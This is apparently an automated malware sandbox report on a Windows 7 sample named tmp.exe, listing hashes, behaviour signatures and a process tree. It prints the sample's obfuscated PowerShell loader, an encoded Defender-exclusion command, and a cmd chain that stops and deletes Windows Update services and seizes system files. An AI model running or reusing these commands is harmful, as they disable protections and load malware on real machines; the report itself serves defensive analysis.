Analysis
-
max time kernel
151s -
max time network
52s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
17-01-2023 20:24
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20221111-en
General
-
Target
tmp.exe
-
Size
4.9MB
-
MD5
619c8566b61a49d28d25590a16611849
-
SHA1
d6c75e985d9ae6ff79b29bf39cac1d7514e7a473
-
SHA256
aa0a1f379ba188db1bec2c91b483e9b628ddc319da17876cc0bab9d75b756cd2
-
SHA512
a367b2188076923c050879685196dcbbe036dd317e0c976a45999008938fe15621ed69691e9817965df0957abe1a00017ddbe6fa0b0d83a6c5b66ca08de63363
-
SSDEEP
98304:ZlsCMnpZW6zAEqWn4mb8AarnNGEsOOFUySajl69XE:bsdnm68Ev44/2nk8OF1xjl69
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2000 created 416 2000 powershell.EXE winlogon.exe -
Drops file in Drivers directory 2 IoCs
Processes:
tmp.exeMicrosoftEdgeUpdate.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts tmp.exe File opened for modification C:\Windows\system32\drivers\etc\hosts MicrosoftEdgeUpdate.exe -
Executes dropped EXE 1 IoCs
Processes:
MicrosoftEdgeUpdate.exepid process 1176 MicrosoftEdgeUpdate.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1776 takeown.exe 956 icacls.exe 1008 takeown.exe 1748 icacls.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/1352-54-0x0000000001030000-0x00000000019B4000-memory.dmp vmprotect \Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe vmprotect C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe vmprotect C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe vmprotect behavioral1/memory/1176-129-0x0000000000340000-0x0000000000CC4000-memory.dmp vmprotect -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1680 cmd.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 1532 taskeng.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1008 takeown.exe 1748 icacls.exe 1776 takeown.exe 956 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 ip-api.com -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.EXEpowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
tmp.exepowershell.EXEdescription pid process target process PID 1352 set thread context of 572 1352 tmp.exe conhost.exe PID 2000 set thread context of 1076 2000 powershell.EXE dllhost.exe -
Drops file in Program Files directory 3 IoCs
Processes:
tmp.exeMicrosoftEdgeUpdate.exedescription ioc process File created C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe tmp.exe File opened for modification C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe tmp.exe File created C:\Program Files\Google\Libs\WR64.sys MicrosoftEdgeUpdate.exe -
Drops file in Windows directory 6 IoCs
Processes:
conhost.exesvchost.exedescription ioc process File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job svchost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 856 sc.exe 832 sc.exe 852 sc.exe 624 sc.exe 744 sc.exe 108 sc.exe 1444 sc.exe 2016 sc.exe 316 sc.exe 736 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 5 IoCs
Processes:
powershell.EXEMicrosoftEdgeUpdate.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30d6a642ba2ad901 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" MicrosoftEdgeUpdate.exe -
Modifies registry key 1 TTPs 17 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1680 reg.exe 1712 reg.exe 1516 reg.exe 1544 reg.exe 2016 reg.exe 900 reg.exe 316 reg.exe 1496 reg.exe 1608 reg.exe 2000 reg.exe 2000 reg.exe 1676 reg.exe 580 reg.exe 1184 reg.exe 1412 reg.exe 1984 reg.exe 1360 reg.exe -
Processes:
tmp.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde tmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 tmp.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exetmp.exepowershell.EXEdllhost.exedllhost.exepowershell.exepid process 1244 powershell.exe 1352 tmp.exe 2000 powershell.EXE 2000 powershell.EXE 1076 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 852 dllhost.exe 852 dllhost.exe 852 dllhost.exe 852 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 852 dllhost.exe 852 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 852 dllhost.exe 852 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 852 dllhost.exe 852 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 852 dllhost.exe 852 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 852 dllhost.exe 852 dllhost.exe 852 dllhost.exe 852 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 852 dllhost.exe 852 dllhost.exe 1224 powershell.exe 1076 dllhost.exe 1076 dllhost.exe 852 dllhost.exe 852 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 852 dllhost.exe 852 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 852 dllhost.exe 852 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 852 dllhost.exe 852 dllhost.exe 1076 dllhost.exe 1076 dllhost.exe 852 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1284 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetmp.exetakeown.exepowershell.EXEdllhost.exedllhost.exesvchost.exepowershell.exepowercfg.exeMicrosoftEdgeUpdate.exepowercfg.exedescription pid process Token: SeDebugPrivilege 1244 powershell.exe Token: SeShutdownPrivilege 920 powercfg.exe Token: SeShutdownPrivilege 1644 powercfg.exe Token: SeShutdownPrivilege 1640 powercfg.exe Token: SeShutdownPrivilege 2004 powercfg.exe Token: SeDebugPrivilege 1352 tmp.exe Token: SeTakeOwnershipPrivilege 1008 takeown.exe Token: SeDebugPrivilege 2000 powershell.EXE Token: SeDebugPrivilege 2000 powershell.EXE Token: SeDebugPrivilege 1076 dllhost.exe Token: SeDebugPrivilege 852 dllhost.exe Token: SeAuditPrivilege 868 svchost.exe Token: SeDebugPrivilege 1224 powershell.exe Token: SeShutdownPrivilege 544 powercfg.exe Token: SeDebugPrivilege 1176 MicrosoftEdgeUpdate.exe Token: SeShutdownPrivilege 944 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 868 svchost.exe Token: SeIncreaseQuotaPrivilege 868 svchost.exe Token: SeSecurityPrivilege 868 svchost.exe Token: SeTakeOwnershipPrivilege 868 svchost.exe Token: SeLoadDriverPrivilege 868 svchost.exe Token: SeSystemtimePrivilege 868 svchost.exe Token: SeBackupPrivilege 868 svchost.exe Token: SeRestorePrivilege 868 svchost.exe Token: SeShutdownPrivilege 868 svchost.exe Token: SeSystemEnvironmentPrivilege 868 svchost.exe Token: SeUndockPrivilege 868 svchost.exe Token: SeManageVolumePrivilege 868 svchost.exe Token: SeAssignPrimaryTokenPrivilege 868 svchost.exe Token: SeIncreaseQuotaPrivilege 868 svchost.exe Token: SeSecurityPrivilege 868 svchost.exe Token: SeTakeOwnershipPrivilege 868 svchost.exe Token: SeLoadDriverPrivilege 868 svchost.exe Token: SeSystemtimePrivilege 868 svchost.exe Token: SeBackupPrivilege 868 svchost.exe Token: SeRestorePrivilege 868 svchost.exe Token: SeShutdownPrivilege 868 svchost.exe Token: SeSystemEnvironmentPrivilege 868 svchost.exe Token: SeUndockPrivilege 868 svchost.exe Token: SeManageVolumePrivilege 868 svchost.exe Token: SeAssignPrimaryTokenPrivilege 868 svchost.exe Token: SeIncreaseQuotaPrivilege 868 svchost.exe Token: SeSecurityPrivilege 868 svchost.exe Token: SeTakeOwnershipPrivilege 868 svchost.exe Token: SeLoadDriverPrivilege 868 svchost.exe Token: SeSystemtimePrivilege 868 svchost.exe Token: SeBackupPrivilege 868 svchost.exe Token: SeRestorePrivilege 868 svchost.exe Token: SeShutdownPrivilege 868 svchost.exe Token: SeSystemEnvironmentPrivilege 868 svchost.exe Token: SeUndockPrivilege 868 svchost.exe Token: SeManageVolumePrivilege 868 svchost.exe Token: SeAssignPrimaryTokenPrivilege 868 svchost.exe Token: SeIncreaseQuotaPrivilege 868 svchost.exe Token: SeSecurityPrivilege 868 svchost.exe Token: SeTakeOwnershipPrivilege 868 svchost.exe Token: SeLoadDriverPrivilege 868 svchost.exe Token: SeSystemtimePrivilege 868 svchost.exe Token: SeBackupPrivilege 868 svchost.exe Token: SeRestorePrivilege 868 svchost.exe Token: SeShutdownPrivilege 868 svchost.exe Token: SeSystemEnvironmentPrivilege 868 svchost.exe Token: SeUndockPrivilege 868 svchost.exe Token: SeManageVolumePrivilege 868 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
tmp.execmd.execmd.exedescription pid process target process PID 1352 wrote to memory of 1244 1352 tmp.exe powershell.exe PID 1352 wrote to memory of 1244 1352 tmp.exe powershell.exe PID 1352 wrote to memory of 1244 1352 tmp.exe powershell.exe PID 1352 wrote to memory of 1492 1352 tmp.exe cmd.exe PID 1352 wrote to memory of 1492 1352 tmp.exe cmd.exe PID 1352 wrote to memory of 1492 1352 tmp.exe cmd.exe PID 1352 wrote to memory of 1020 1352 tmp.exe cmd.exe PID 1352 wrote to memory of 1020 1352 tmp.exe cmd.exe PID 1352 wrote to memory of 1020 1352 tmp.exe cmd.exe PID 1492 wrote to memory of 856 1492 cmd.exe sc.exe PID 1492 wrote to memory of 856 1492 cmd.exe sc.exe PID 1492 wrote to memory of 856 1492 cmd.exe sc.exe PID 1020 wrote to memory of 920 1020 cmd.exe powercfg.exe PID 1020 wrote to memory of 920 1020 cmd.exe powercfg.exe PID 1020 wrote to memory of 920 1020 cmd.exe powercfg.exe PID 1492 wrote to memory of 832 1492 cmd.exe sc.exe PID 1492 wrote to memory of 832 1492 cmd.exe sc.exe PID 1492 wrote to memory of 832 1492 cmd.exe sc.exe PID 1020 wrote to memory of 1644 1020 cmd.exe powercfg.exe PID 1020 wrote to memory of 1644 1020 cmd.exe powercfg.exe PID 1020 wrote to memory of 1644 1020 cmd.exe powercfg.exe PID 1492 wrote to memory of 1444 1492 cmd.exe sc.exe PID 1492 wrote to memory of 1444 1492 cmd.exe sc.exe PID 1492 wrote to memory of 1444 1492 cmd.exe sc.exe PID 1492 wrote to memory of 852 1492 cmd.exe sc.exe PID 1492 wrote to memory of 852 1492 cmd.exe sc.exe PID 1492 wrote to memory of 852 1492 cmd.exe sc.exe PID 1020 wrote to memory of 1640 1020 cmd.exe powercfg.exe PID 1020 wrote to memory of 1640 1020 cmd.exe powercfg.exe PID 1020 wrote to memory of 1640 1020 cmd.exe powercfg.exe PID 1492 wrote to memory of 624 1492 cmd.exe sc.exe PID 1492 wrote to memory of 624 1492 cmd.exe sc.exe PID 1492 wrote to memory of 624 1492 cmd.exe sc.exe PID 1492 wrote to memory of 1184 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1184 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1184 1492 cmd.exe reg.exe PID 1020 wrote to memory of 2004 1020 cmd.exe powercfg.exe PID 1020 wrote to memory of 2004 1020 cmd.exe powercfg.exe PID 1020 wrote to memory of 2004 1020 cmd.exe powercfg.exe PID 1492 wrote to memory of 1680 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1680 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1680 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1712 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1712 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1712 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1412 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1412 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1412 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1984 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1984 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1984 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1008 1492 cmd.exe takeown.exe PID 1492 wrote to memory of 1008 1492 cmd.exe takeown.exe PID 1492 wrote to memory of 1008 1492 cmd.exe takeown.exe PID 1492 wrote to memory of 1748 1492 cmd.exe icacls.exe PID 1492 wrote to memory of 1748 1492 cmd.exe icacls.exe PID 1492 wrote to memory of 1748 1492 cmd.exe icacls.exe PID 1492 wrote to memory of 1608 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1608 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1608 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1516 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1516 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1516 1492 cmd.exe reg.exe PID 1492 wrote to memory of 1544 1492 cmd.exe reg.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {2D4C2EB5-73A1-4D2D-B9BA-1ACD2C11BC28} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
-
C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcAB3AHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHQAbQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBvAHYAYwBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdgBsAHUAIwA+AA=="5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f6⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵
- Modifies registry key
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "gnkvzaivrlft"5⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{842ca563-61ab-497b-9870-19d81160ce08}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{832cfe56-f95e-4812-b0ca-c99bad1e1a7e}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
